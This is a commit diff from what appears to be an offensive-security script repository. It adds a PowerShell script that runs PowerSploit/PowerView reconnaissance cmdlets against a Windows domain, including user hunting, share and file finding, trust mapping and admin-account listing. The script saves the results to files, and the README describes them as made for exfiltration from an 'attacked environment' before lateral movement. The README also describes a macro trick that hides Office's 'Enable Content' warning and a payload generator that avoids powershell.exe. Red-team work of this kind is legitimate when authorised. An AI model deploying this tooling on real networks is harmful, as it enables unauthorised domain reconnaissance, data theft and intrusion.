Renamed directory and added new script.

README.md

@@ -12,7 +12,7 @@ This repository is divided further onto following directories:
 - `linux` - Contains linux-based scripts for various purposes.
 - `networks` - Network devices & services Penetration Testing and auditing scripts
 - `others` - Others related somehow to penetration tests & Audits
-- `social-engineering` - Powershell, Visual Basic, js, phishings and other alike candys
+- `red-teaming` - Powershell, Visual Basic, js, phishings and other alike candys
 - `web` - Web-Application auditing, pentesting, fuzzing related.
 - `windows` - Windows utilities, scripts, exploits.
 

red-teaming/Export-ReconData.ps1

@@ -0,0 +1,113 @@
+#requires -version 2
+
+<#
+
+	This script launches many PowerView cmdlets and stores their output 
+	in Clixml files for later processing.
+
+	Author: Mariusz B. (mgeeky), '18
+	License: BSD 3-Clause
+	Required Dependencies: PowerSploit's Recon.psm1
+#>
+
+function Export-ReconData
+{
+	$DirName = (Get-Date).ToString("PowerView-MM-dd-yyyy-hh-mm-ss")
+	New-Item -Name $DirName -ItemType Directory | Out-Null
+
+	Write-Output "`n:: Logs to be stored in: $DirName`n"
+
+	$ReconModuleCommands = Get-Command -Module Recon
+	$Commands = @()
+
+	$ReconModuleCommands `
+		| Where-Object {$_.Name -like "Get-Net*"} `
+		| Select Name `
+		| ForEach-Object {$Commands += $_.Name}
+
+	$Commands += "Invoke-UserHunter -ShowAll"
+	$Commands += "Invoke-StealthUserHunter -ShowAll"
+	$Commands += "Invoke-FileFinder -SearchSYSVol"
+	$Commands += "Invoke-ShareFinder"
+	$Commands += "Invoke-MapDomainTrust"
+	$Commands += "Find-GPOLocation"
+	$Commands += "Get-NetUser -AdminCount"
+	$Commands += "Find-ForeignUser"
+	$Commands += "Find-ForeignGroup"
+	$Commands += "Invoke-FileFinder"
+
+	$Commands | ForEach-Object {
+		$Name = $_
+		$Name -match "[A-Za-z]+-(.+)" | Out-Null
+
+		$FileName = $matches[1] + ".xml"
+		$FileName = $FileName -replace ' ',''
+
+		If ($Name -like "Get-Net*")
+		{
+			#$Name = $Name + " -Recurse"
+		}
+
+		Write-Output "--- $Name ---"
+		$Name | Invoke-Expression | Export-Clixml $DirName\$FileName
+		Write-Output "Done.`n"
+	}
+}
+
+function Import-ReconData
+{
+	Param
+	(
+		[Parameter(Position = 0, Mandatory = $True)]
+		[ValidateNotNullOrEmpty()]
+		[String]
+		$DirName
+	)
+	$path = Get-Location
+	Set-Location -Path $DirName
+
+	Get-ChildItem . -Filter *.xml |
+	Foreach-Object {
+		$Name = $_.BaseName -replace '-',''
+		$Results = Import-Clixml -Path "$_"
+		New-Variable -Name $Name -Force -Value $Results -Scope Global
+		Write-Output "Loaded `$$Name results."
+	}
+
+	Set-Location -Path $path
+}
+
+function Get-ReconData
+{
+	Param
+	(
+		[Parameter(Position = 0, Mandatory = $True)]
+		[ValidateNotNullOrEmpty()]
+		[String]
+		$DirName
+	)
+	$path = Get-Location
+	$Variables = Get-Variable
+	Set-Location -Path $DirName
+
+	Get-ChildItem . -Filter *.xml |
+	Foreach-Object {
+		$Name = $_.BaseName -replace '-',''
+		If ($Variables | Where-Object { $_.Name -eq $Name })
+		{
+			Write-Output "Previously loaded: `$$Name"
+		}
+	}
+
+	Set-Location -Path $path
+}
+
+Try 
+{
+	# You need to be in PowerSploit\Recon directory
+	Import-Module .\Recon.psm1
+} 
+Catch [System.Exception]
+{
+	exit
+}

red-teaming/README.md

@@ -18,6 +18,50 @@ IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Com
 
 - **`delete-warning-div-macro.vbs`** - VBA Macro function to be used as a Social Engineering trick removing "Enable Content" warning message as the topmost floating text box with given name. ([gist](https://gist.github.com/mgeeky/9cb6acdec31c8a70cc037c84c77a359c))
 
+- **`Export-ReconData.ps1`** - Powershell script leveraging [PowerSploit Recon](https://github.com/PowerShellMafia/PowerSploit) module (PowerView) to save output from Reconnaissance cmdlets like `Get-Net*`, `Invoke-*` into _Clixml_ files. Those files can later be extracted from attacked environment and loaded to a new powershell runspace using the same script. Very useful when we want to obtain as many data as possible, then exfiltrate that data, review it in our safe place and then get back to attacked domain for lateral spread.
+
+Exposed functions:
+- `Export-ReconData` - Launches many cmdlets and exports their Clixml outputs.
+- `Import-ReconData -DirName <DIR>` - Loads Clixml previously exported outputs and stores them in Global variables reachable when script terminates.
+- `Get-ReconData -DirName <DIR>` - Gets names of variables that were created and contains previously imported data.
+
+```
+PS E:\PowerSploit\Recon> Load-ReconData -DirName .\PowerView-12-18-2018-08-30-09
+Loaded $FileFinderSearchSYSVol results.
+Loaded $FileFinder results.
+Loaded $ForeignGroup results.
+Loaded $ForeignUser results.
+Loaded $GPOLocation results.
+Loaded $MapDomainTrust results.
+Loaded $NetComputer results.
+Loaded $NetDomain results.
+Loaded $NetDomainController results.
+Loaded $NetDomainTrust results.
+Loaded $NetFileServer results.
+Loaded $NetForest results.
+Loaded $NetForestCatalog results.
+Loaded $NetForestDomain results.
+Loaded $NetForestTrust results.
+Loaded $NetGPO results.
+Loaded $NetGPOGroup results.
+Loaded $NetGroup results.
+Loaded $NetGroupMember results.
+Loaded $NetLocalGroup results.
+Loaded $NetLoggedon results.
+Loaded $NetOU results.
+Loaded $NetProcess results.
+Loaded $NetRDPSession results.
+Loaded $NetSession results.
+Loaded $NetShare results.
+Loaded $NetSite results.
+Loaded $NetSubnet results.
+Loaded $NetUserAdminCount results.
+Loaded $NetUser results.
+Loaded $ShareFinder results.
+Loaded $StealthUserHunterShowAll results.
+Loaded $UserHunterShowAll results.
+```
+
 - **`generateMSBuildPowershellXML.py`** - Powershell via MSBuild inline-task XML payload generation script - To be used during Red-Team assignments to launch Powershell payloads without using `powershell.exe` ([gist](https://gist.github.com/mgeeky/df9f313cfe468e56c59268b958319bcb))
 
     Example output **not minimized**: